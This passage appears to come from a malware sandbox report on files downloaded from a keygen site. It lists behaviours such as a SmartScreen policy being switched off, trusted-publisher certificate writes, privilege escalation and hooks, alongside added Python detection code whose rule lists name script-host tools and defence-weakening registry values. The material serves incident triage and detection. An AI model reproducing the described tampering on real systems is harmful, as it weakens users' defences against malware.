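            raise ValueError("truncated data for property %d" % prop_id)
        props[prop_id] = data
        off += length
    return props


def check_store_entry(key_path: str, blob: bytes) -> dict:
    """Summarise one registry entry the way a responder wants to see it."""
    parts = key_path.split("\\")
    if len(parts) < 4 or parts[-2] != "Certificates":
        raise ValueError("not a ...\\<store>\\Certificates\\<thumbprint> path")
    store, thumbprint = parts[-3], parts[-1].lower()
    props = parse_blob(blob)
    der = props.get(32)
    if der is None:
        raise ValueError("no CERT_CERT_PROP_ID record in blob")
    sha1 = hashlib.sha1(der).hexdigest()
    sha1_prop = props.get(3)
    friendly = props.get(11, b"").decode("utf-16-le").rstrip("\x00")
    return {
        "hive": "HKLM" if key_path.startswith("\\REGISTRY\\MACHINE") else "HKU",
        "store": store,
        "changes_trust": store in TRUST_STORES,
        # key name and (if present) the SHA-1 property must both match the DER
        "thumbprint_ok": thumbprint == sha1 and (sha1_prop is None or sha1_prop.hex() == sha1),
        "sha1": sha1,
        "sha256": hashlib.sha256(der).hexdigest(),
        "friendly_name": friendly,
        "key_bits": struct.unpack("<I", props[92])[0] if 92 in props else None,
        "properties": [PROP_NAMES.get(p, "prop_%d" % p) for p in props],
    }


def build_blob(der: bytes, friendly: str, key_bits: int) -> bytes:
    """Serialise records in the same layout; used only to build the sample."""
    def rec(prop_id, data):
        return struct.pack("<III", prop_id, 1, len(data)) + data
    return (rec(92, struct.pack("<I", key_bits))
            + rec(3, hashlib.sha1(der).digest())
            + rec(11, (friendly + "\x00").encode("utf-16-le"))
            + rec(32, der))


# Constructed sample: FAKE_DER stands in for a DER certificate (arbitrary bytes),
# and the key path mimics the TrustedPublisher entries written by vpn.tmp above.
FAKE_DER = b"\x30\x82\x00\x10" + bytes(range(16))
SAMPLE_BLOB = build_blob(FAKE_DER, "Example Publisher", 2048)
SAMPLE_KEY = ("\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\"
              "TrustedPublisher\\Certificates\\" + hashlib.sha1(FAKE_DER).hexdigest().upper())


def sample_report() -> dict:
    return check_store_entry(SAMPLE_KEY, SAMPLE_BLOB)


if __name__ == "__main__":
    for name, value in sample_report().items():
        print("%-15s %s" % (name, value))
```

On a live host the same Blob bytes can be read with the standard winreg module and passed to check_store_entry unchanged. When triaging output like the table above, the AuthRoot writes of public roots (the blobs decode to DigiCert Assured ID Root CA, AAA Certificate Services and Starfield Class 2 Certification Authority) are usually Windows populating its root cache while building a chain, so they are low signal by themselves; the TrustedPublisher additions by vpn.tmp are the ones worth reviewing, because a publisher certificate in that store suppresses the Authenticode prompt for code it signed.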
Runs ping.exe 1 TTPs 12 IoCs
pid   Process
496   PING.EXE
7660  PING.EXE
5148  PING.EXE
6408  PING.EXE
4604  PING.EXE
8624  PING.EXE
2640  PING.EXE
5804  PING.EXE
6916  PING.EXE
5864  PING.EXE
6092  PING.EXE
8148  PING.EXE
Script User-Agent 40 IoCs
Uses user-agent string associated with script host/environment.
All 40 flagged flows carry the same HTTP User-Agent header value:
  Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
flows (in report order): 1078, 1082, 1176, 1191, 215, 218, 276, 1034, 413, 906, 1088, 842, 415, 486, 829, 838, 251, 1188, 412, 871, 1144, 1260, 216, 370, 504, 830, 1189, 1257, 247, 336, 478, 837, 1020, 1165, 1171, 1175, 470, 471, 833, 1019
This string is the default User-Agent of the WinHTTP COM object (WinHttp.WinHttpRequest.5.1), which VBScript/JScript, PowerShell and Office macros use for downloads; an interactive browser session never sends it, so it is a reliable pivot for finding the second-stage downloads in the network capture.
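The User-Agent pivot described above, written out as detection logic. This is an added example, not code from the sandbox report: it parses a constructed key=value flow log (the sandbox's own export format is different), classifies each User-Agent as a script host, a Windows-internal component or other, and groups the script-host flows by exact UA so that one finding summarises a burst like the 40 flows above. The marker lists and the sample log lines are assumptions made for the example; the WinHttp.WinHttpRequest value is the one the report flags.

```python
"""Flag HTTP flows whose User-Agent identifies a script host rather than a browser."""
import re
from collections import defaultdict

# User-Agent markers of script/automation hosts. This list is the example's own
# (an assumption; extend it for your environment). The first entry is the default
# UA of the WinHTTP COM object (WinHttp.WinHttpRequest.5.1) used from VBScript,
# JScript, PowerShell and Office macros, which is the value the report flags.
SCRIPT_HOST_MARKERS = {
    "winhttp-com":     re.compile(r"WinHttp\.WinHttpRequest", re.I),
    "powershell":      re.compile(r"WindowsPowerShell/", re.I),
    "python-requests": re.compile(r"^python-requests/", re.I),
    "curl":            re.compile(r"^curl/", re.I),
}

# Non-browser UAs that belong to Windows components rather than scripts. Without
# this allowlist CryptoAPI revocation checks and BITS downloads would be flagged.
WINDOWS_INTERNAL_MARKERS = [
    re.compile(r"^Microsoft-CryptoAPI/"),  # CAPI2 fetching AIA, CRL and OCSP data
    re.compile(r"^Microsoft BITS/"),       # Background Intelligent Transfer Service
]

# Constructed key=value log shape (not the sandbox's own export format).
LOG_LINE = re.compile(
    r'flow=(?P<flow>\d+) pid=(?P<pid>\d+) image="(?P<image>[^"]*)" ua="(?P<ua>[^"]*)"')


def parse_line(line):
    """Parse one log line into a dict, or return None for lines that do not match."""
    m = LOG_LINE.search(line)
    if m is None:
        return None
    return {"flow": int(m["flow"]), "pid": int(m["pid"]),
            "image": m["image"], "ua": m["ua"]}


def classify_ua(ua):
    """Return 'windows-internal', a script-host tag, or 'other' (browser-like / unknown)."""
    if any(rx.search(ua) for rx in WINDOWS_INTERNAL_MARKERS):
        return "windows-internal"
    for tag, rx in SCRIPT_HOST_MARKERS.items():
        if rx.search(ua):
            return tag
    return "other"


def script_host_findings(lines):
    """Group script-host flows by exact UA string; one finding per UA, busiest first."""
    buckets = defaultdict(lambda: {"flows": [], "pids": set(), "images": set()})
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        tag = classify_ua(rec["ua"])
        if tag in ("other", "windows-internal"):
            continue
        b = buckets[(tag, rec["ua"])]
        b["flows"].append(rec["flow"])
        b["pids"].add(rec["pid"])
        b["images"].add(rec["image"])
    findings = [
        {"tag": tag, "ua": ua, "flow_count": len(b["flows"]), "flows": sorted(b["flows"]),
         "pids": sorted(b["pids"]), "images": sorted(b["images"])}
        for (tag, ua), b in buckets.items()
    ]
    findings.sort(key=lambda f: -f["flow_count"])
    return findings


# Constructed sample: three WinHTTP requests from a script host, one PowerShell
# download, one Chrome page load, one CryptoAPI fetch and one unparseable line.
SAMPLE_LOG = [
    r'flow=101 pid=4100 image="C:\Windows\System32\wscript.exe" ua="Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"',
    r'flow=102 pid=4100 image="C:\Windows\System32\wscript.exe" ua="Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"',
    r'flow=103 pid=4180 image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ua="Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1"',
    r'flow=104 pid=3912 image="C:\Program Files\Google\Chrome\Application\chrome.exe" ua="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36"',
    r'flow=105 pid=1200 image="C:\Windows\System32\svchost.exe" ua="Microsoft-CryptoAPI/10.0"',
    r'flow=106 pid=4100 image="C:\Windows\System32\wscript.exe" ua="Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"',
    "malformed line that the parser must skip",
]

if __name__ == "__main__":
    for f in script_host_findings(SAMPLE_LOG):
        print(f"{f['tag']:<16} flows={f['flow_count']:<3} pids={f['pids']} ua={f['ua']}")
```

Grouping by the exact UA string rather than by marker matters in practice: a malware family that hard-codes its own UA shows up as a separate bucket from the generic WinHTTP default, and the pid/image sets tell you which dropped binary owns each burst.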
Suspicious behavior: EnumeratesProcesses 64 IoCs
(64 is the report's per-signature listing cap, so this and the other 64-entry lists below are truncated.)
pid   Process           entries
2816  chrome.exe        2
3912  chrome.exe        2
4820  chrome.exe        2
4216  chrome.exe        2
4408  chrome.exe        2
4600  chrome.exe        2
4760  chrome.exe        2
4928  chrome.exe        2
4056  setups.tmp        2
4232  Conhost.exe       2
3644  svchost.exe       2
5100  multitimer.exe    18
1488  mt1fu32iu4k.tmp   2
5344  apipostback.exe   2
5228  vpn.tmp           4
4328  chrome.exe        2
5976  chrome.exe        2
6792  rundll32.exe      2
6832  regsvr32.exe      2
6528  RunWW.exe         2
2804  setups.tmp        2
6528  RunWW.exe         4
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid   Process
2260  Process not Found
Suspicious behavior: MapViewOfSection 20 IoCs
pid   Process              entries (in report order)
3160  MicrosoftEdgeCP.exe  13
6584  6762a766.exe         1
3160  MicrosoftEdgeCP.exe  3
7972  6762a766.exe         1
3160  MicrosoftEdgeCP.exe  2
Suspicious behavior: SetClipboardViewer 2 IoCs
pid   Process
9460  1416094.exe
8516  4458909.exe
SetClipboardViewer registers the caller for clipboard-change notifications; stealers and "clippers" use it to watch for pasted credentials or wallet addresses, so these two PIDs are worth pairing with the stealer families listed at the top of the report.
Suspicious use of AdjustPrivilegeToken 64 IoCs
pid   Process           privileges enabled (in report order)
2608  Setup.exe         SeDebugPrivilege
4232  Conhost.exe       SeDebugPrivilege (2 entries)
3644  svchost.exe       SeTcbPrivilege
4232  Conhost.exe       SeDebugPrivilege (7 entries)
5100  multitimer.exe    SeDebugPrivilege
4232  Conhost.exe       SeDebugPrivilege (4 entries)
4744  askinstall20.exe  SeCreateTokenPrivilege, SeAssignPrimaryTokenPrivilege, SeLockMemoryPrivilege, SeIncreaseQuotaPrivilege, SeMachineAccountPrivilege, SeTcbPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeSystemEnvironmentPrivilege, SeChangeNotifyPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeSyncAgentPrivilege, SeEnableDelegationPrivilege, SeManageVolumePrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, 31, 32, 33, 34, 35
788   MicrosoftEdge.exe SeDebugPrivilege (4 entries)
4040  taskkill.exe      SeDebugPrivilege
2220  svchost.exe       SeAuditPrivilege
2404  svchost.exe       SeAssignPrimaryTokenPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemtimePrivilege, SeBackupPrivilege, SeRestorePrivilege
The askinstall20.exe entry is every privilege LUID from 2 (SeCreateTokenPrivilege) to 35 in ascending order, i.e. a blanket AdjustTokenPrivileges over everything the token could hold rather than a request for one specific right; the four unnamed values the report did not resolve are SeTrustedCredManAccessPrivilege (31), SeRelabelPrivilege (32), SeIncreaseWorkingSetPrivilege (33), SeTimeZonePrivilege (34) and SeCreateSymbolicLinkPrivilege (35). A console host (Conhost.exe, PID 4232) repeatedly enabling SeDebugPrivilege is not normal conhost behaviour and is worth verifying against the process tree.
Suspicious use of FindShellTrayWindow 64 IoCs
pid   Process           entries (in report order)
3912  chrome.exe        12
1488  mt1fu32iu4k.tmp   1
5300  Setup3310.tmp     1
5408  zjqs2pkwltw.exe   1
5228  vpn.tmp           43
5976  chrome.exe        1
5228  vpn.tmp           5
Suspicious use of SendNotifyMessage 6 IoCs
pid   Process            entries
644   Weather.exe        5
2260  Process not Found  1
Suspicious use of SetWindowsHookEx 19 IoCs
pid   Process              entries (in report order)
788   MicrosoftEdge.exe    1
3160  MicrosoftEdgeCP.exe  2
8068  google-game.exe      2
6928  google-game.exe      2
5844  MaskVPNUpdate.exe    1
8372  Full Version.exe     2
5440  Full Version.exe     2
2260  Process not Found    7
SetWindowsHookEx is the classic keyboard-hook and hook-based DLL-injection primitive, but GUI frameworks also install hooks routinely; treat it as corroborating evidence for the dropped binaries (google-game.exe, "Full Version.exe", MaskVPNUpdate.exe) rather than as a finding on its own.
Suspicious use of WriteProcessMemory 64 IoCs
description                       pid   Process     procid_target  entries
PID 3912 wrote to memory of 3232  3912  chrome.exe  71             2
PID 3912 wrote to memory of 2712  3912  chrome.exe  75             40
PID 3912 wrote to memory of 2816  3912  chrome.exe  76             2
PID 3912 wrote to memory of 3960  3912  chrome.exe  77             20
All 64 listed entries are the Chrome browser process (3912) writing into its own children (3232 crashpad-handler, 2712 gpu-process, 2816 network service, 3960 renderer), which is how Chrome bootstraps sandboxed child processes. The listing cap is filled by these before any later process in the run, so this signature says nothing about the dropped installers here.
System policy modification 1 TTPs 1 IoCs
description       ioc                                                                                              Process
Set value (int)   \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableSmartScreen = "0"   RegAsm.exe
Writing EnableSmartScreen = 0 under this HKLM policy key turns Windows SmartScreen off machine-wide for every user. The write needs administrative rights, so RegAsm.exe (a .NET Framework utility that is a common host for injected payloads) was running elevated at that point; on a real host, check who launched it and what module it had loaded.
Views/modifies file attributes 1 TTPs 4 IoCs
pid   Process
4112  attrib.exe
584   attrib.exe
4904  attrib.exe
7892  attrib.exe
The report does not show the attrib.exe command lines; installers and droppers usually call it with +h and +s to hide the files they wrote, so the dropped paths are the next thing to pull from the full process tree.
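The two registry findings in this report (the SmartScreen policy write by RegAsm.exe just above, and the certificate Blob writes under SystemCertificates by keygen-step-2.exe and zjqs2pkwltw.exe at the top of this section) call for the same triage step, so here is one added example that covers both. It is not code from the sandbox or the report: it evaluates constructed "Set value" events against a small rule table (an assumption; extend it), flags policy values that weaken defences, and separates certificate-store writes that change trust (Root, TrustedPublisher) from the AuthRoot and CA caches that Windows itself fills while building a chain, which is the caveat to remember before treating a cert Blob write as malicious. The AuthRoot thumbprint is the one from the report; the process paths and the Root thumbprint are placeholders.

```python
"""Triage registry Set-value events for policy tampering and certificate-store writes."""
import re

# Policy values whose new data weakens platform defences. This table is the
# example's own (an assumption); the first entry is the write seen in the report.
# EnableSmartScreen lives both under ...\CurrentVersion\Policies\System (legacy)
# and under HKLM\SOFTWARE\Policies\Microsoft\Windows\System, so the key pattern
# only requires a "Policies" component somewhere above a "System" leaf.
POLICY_RULES = [
    (r"\\Policies\\(.*\\)?System$", "EnableSmartScreen", "0", "SmartScreen disabled by policy"),
    (r"\\Policies\\(.*\\)?System$", "EnableLUA", "0", "UAC disabled by policy"),
    (r"\\Policies\\Microsoft\\Windows Defender$", "DisableAntiSpyware", "1", "Defender disabled by policy"),
]

# Certificate store keys look like ...\SystemCertificates\<store>\Certificates\<SHA-1 thumbprint>
CERT_KEY = re.compile(
    r"\\SystemCertificates\\(?P<store>[^\\]+)\\Certificates\\(?P<thumb>[0-9A-Fa-f]{40})$")

# Stores where a new Blob changes what the machine trusts.
TRUST_STORES = {
    "root": "new trusted root CA installed",
    "trustedpublisher": "new trusted publisher installed",
    "trustedpeople": "new trusted person installed",
}
# Stores Windows itself fills while building a chain: AuthRoot via the automatic
# root update, CA via AIA fetching. A write here is a normal side effect of
# verifying a signed file, so it is reported as info rather than as an alert.
CACHE_STORES = {"authroot", "ca"}


def eval_event(ev):
    """Return a finding for one Set-value event, or None if no rule matches."""
    key, name, data = ev["key"], ev["name"], ev["data"]
    for key_rx, value_name, bad_data, title in POLICY_RULES:
        if (re.search(key_rx, key, re.IGNORECASE)
                and name.lower() == value_name.lower()
                and str(data) == bad_data):
            return {"severity": "high", "rule": title, "process": ev["process"],
                    "key": key, "thumbprint": None}
    m = CERT_KEY.search(key)
    if m and name.lower() == "blob":
        store, thumb = m["store"].lower(), m["thumb"].upper()
        base = {"process": ev["process"], "key": key, "thumbprint": thumb}
        if store in TRUST_STORES:
            return {"severity": "high", "rule": TRUST_STORES[store], **base}
        if store in CACHE_STORES:
            return {"severity": "info",
                    "rule": f"{m['store']} cache populated; compare thumbprint with the Microsoft CTL",
                    **base}
        return {"severity": "low", "rule": f"certificate written to {m['store']} store", **base}
    return None


def triage(events):
    """Evaluate every event; return findings highest severity first, stable within a level."""
    rank = {"high": 0, "low": 1, "info": 2}
    findings = [f for f in (eval_event(e) for e in events) if f is not None]
    findings.sort(key=lambda f: rank[f["severity"]])
    return findings


# Constructed events in the shape of the report's "Set value" rows
# (process, key, value name, data). Blob data is truncated placeholder bytes.
SAMPLE_EVENTS = [
    {"process": "RegAsm.exe",
     "key": r"\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System",
     "name": "EnableSmartScreen", "data": 0},
    {"process": "setup.exe",  # placeholder name for a user-level installer
     "key": r"\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43",
     "name": "Blob", "data": b"\x0f\x00\x00\x00"},
    {"process": "setup.exe",  # placeholder thumbprint: a Root write is what would matter
     "key": r"\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\0123456789ABCDEF0123456789ABCDEF01234567",
     "name": "Blob", "data": b"\x0f\x00\x00\x00"},
    {"process": "explorer.exe",  # benign write, must produce no finding
     "key": r"\REGISTRY\USER\S-1-5-21-0-0-0-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced",
     "name": "Hidden", "data": 1},
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"{f['severity']:<5} {f['process']:<12} {f['rule']}  {f['key']}")
```

The info-level AuthRoot finding still carries the thumbprint on purpose: a quick comparison against the Microsoft Certificate Trust List separates a legitimately cached public root (as in this report, where the blob decodes to a DigiCert root) from a self-issued certificate that an installer is staging before moving it into Root.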
Processes
[n] is the depth in the process tree (1 = top-level); children are listed indented under their parent, with the image path, the full command line and any signatures attributed to that PID.
- [1] c:\windows\system32\svchost.exe (PID 68)
  cmdline: c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
- [1] c:\windows\system32\svchost.exe (PID 1196)
  cmdline: c:\windows\system32\svchost.exe -k netsvcs -s UserManager
- [1] c:\windows\system32\svchost.exe (PID 2220)
  cmdline: c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
  signatures: Suspicious use of AdjustPrivilegeToken
- [1] C:\Program Files\Google\Chrome\Application\chrome.exe (PID 3912)
  cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" https://keygenit.com/d/30f8668638112r4p2203.html
  signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of FindShellTrayWindow; Suspicious use of WriteProcessMemory
  - [2] C:\Program Files\Google\Chrome\Application\chrome.exe (PID 3232)
    cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xc8,0xcc,0xd0,0xa4,0xd4,0x7ff91ebf6e00,0x7ff91ebf6e10,0x7ff91ebf6e20
  - [2] C:\Program Files\Google\Chrome\Application\chrome.exe (PID 2712)
    cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1820 /prefetch:2
  - [2] C:\Program Files\Google\Chrome\Application\chrome.exe (PID 2816)
    cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1868 /prefetch:8
    signatures: Suspicious behavior: EnumeratesProcesses
  - [2] C:\Program Files\Google\Chrome\Application\chrome.exe (PID 3960)
    cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2608 /prefetch:1
  - [2] C:\Program Files\Google\Chrome\Application\chrome.exe (PID 3520)
    cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2616 /prefetch:1
  - [2] C:\Program Files\Google\Chrome\Application\chrome.exe (PID 2336)
    cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:1
  - [2] C:\Program Files\Google\Chrome\Application\chrome.exe (PID 1136)
    cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1
  - [2] C:\Program Files\Google\Chrome\Application\chrome.exe (PID 1348)
    cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:1
  - [2] C:\Program Files\Google\Chrome\Application\chrome.exe (PID 504)
    cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:1
  - [2] C:\Program Files\Google\Chrome\Application\chrome.exe (PID 4192)
    cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4192 /prefetch:8
  - [2] C:\Program Files\Google\Chrome\Application\chrome.exe (PID 4332)
    cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4508 /prefetch:8
  - [2] C:\Program Files\Google\Chrome\Application\chrome.exe (PID 4556)
    cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4264 /prefetch:8
  - [2] C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe (PID 4584)
    cmdline: "C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --force-configure-user-settings
    - [3] C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe (PID 4656)
      cmdline: "C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff6a3ce7740,0x7ff6a3ce7750,0x7ff6a3ce7760
  - [2] C:\Program Files\Google\Chrome\Application\chrome.exe (PID 4632)
    cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4280 /prefetch:8
  - [2] C:\Program Files\Google\Chrome\Application\chrome.exe (PID 4692)
    cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4944 /prefetch:8
  - [2] C:\Program Files\Google\Chrome\Application\chrome.exe (PID 4780)
    cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5072 /prefetch:8
  - [2] C:\Program Files\Google\Chrome\Application\chrome.exe (PID 4820)
    cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4956 /prefetch:8
    signatures: Suspicious behavior: EnumeratesProcesses
  - [2] C:\Program Files\Google\Chrome\Application\chrome.exe (PID 4864)
    cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4564 /prefetch:8
  - [2] C:\Program Files\Google\Chrome\Application\chrome.exe (PID 4900)
    cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5024 /prefetch:8
  - [2] C:\Program Files\Google\Chrome\Application\chrome.exe (PID 4936)
    cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4816 /prefetch:8
  - [2] C:\Program Files\Google\Chrome\Application\chrome.exe (PID 4988)
    cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4876 /prefetch:8
  - [2] C:\Program Files\Google\Chrome\Application\chrome.exe (PID 5024)
    cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5340 /prefetch:8
  - [2] C:\Program Files\Google\Chrome\Application\chrome.exe (PID 5064)
    cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5336 /prefetch:8
  - [2] C:\Program Files\Google\Chrome\Application\chrome.exe (PID 5100)
    cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5592 /prefetch:8
  - [2] C:\Program Files\Google\Chrome\Application\chrome.exe (PID 4124)
    cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5604 /prefetch:8
  - [2] C:\Program Files\Google\Chrome\Application\chrome.exe (PID 4216)
    cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5976 /prefetch:8
    signatures: Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5948 /prefetch:82⤵PID:4272
-
-
